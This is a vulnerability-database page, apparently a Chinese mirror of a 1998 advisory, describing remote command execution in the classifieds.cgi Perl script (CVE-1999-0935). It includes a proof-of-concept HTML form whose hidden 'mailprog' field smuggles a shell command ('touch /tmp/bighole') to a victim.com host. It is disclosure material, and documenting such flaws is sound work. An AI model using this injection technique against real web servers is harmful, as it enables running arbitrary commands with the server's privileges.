Greg Matthews – ‘Classifieds.cgi’ 1.0 Hidden Variable
漏洞ID | 1105387 | 漏洞类型 | |
发布时间 | 1998-12-15 | 更新时间 | 1998-12-15 |
CVE编号 | CVE-1999-0935 |
CNNVD-ID | N/A |
漏洞平台 | CGI | CVSS评分 | 10.0 |
|漏洞详情
classifieds.cgi allows remote attackers to execute arbitrary commands by specifying them in a hidden variable in a CGI form.
|漏洞EXP
source: http://www.securityfocus.com/bid/2019/info
Classifieds.cgi is a perl script (part of the classifieds package by Greg Matthews) which provides simple classified ads to web sites. Due to improper input validation it can be used to execute any command on the host machine, with the privileges of the web server. If the attacker can submit a command to run as a hidden variable that command will be executed. Normally this variable is reserved for the mail program and is accessed from an HTML page with the following piece of code: <input type="hidden" name="mailprog" value="/usr/sbin/sendmail">
<form method=post action="/cgi-bin/classifieds.cgi">
<input type="hidden" name="ClassifiedsDir" value="/home/httpd/html/class/ads/">
<input type="hidden" name="ViewDir" value="http://victim.com/class/ads/">
<input type="hidden" name="ErrorReturn" value="http://victim.com/class/index.html">
<input type="hidden" name="ReturnURL" value="http://victim.com/class/hi.html">
<input type="hidden" name="return" value="[email protected]">
<input type="hidden" name="mailprog" value="touch /tmp/bighole">
<b>Which department do you want your ad to be placed in or you would like to view?
</form>
相关推荐: iChat ROOMS Webserver任意文件读取漏洞
iChat ROOMS Webserver任意文件读取漏洞 漏洞ID 1207291 漏洞类型 未知 发布时间 1998-09-09 更新时间 1998-09-09 CVE编号 CVE-1999-0897 CNNVD-ID CNNVD-199809-010 漏…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666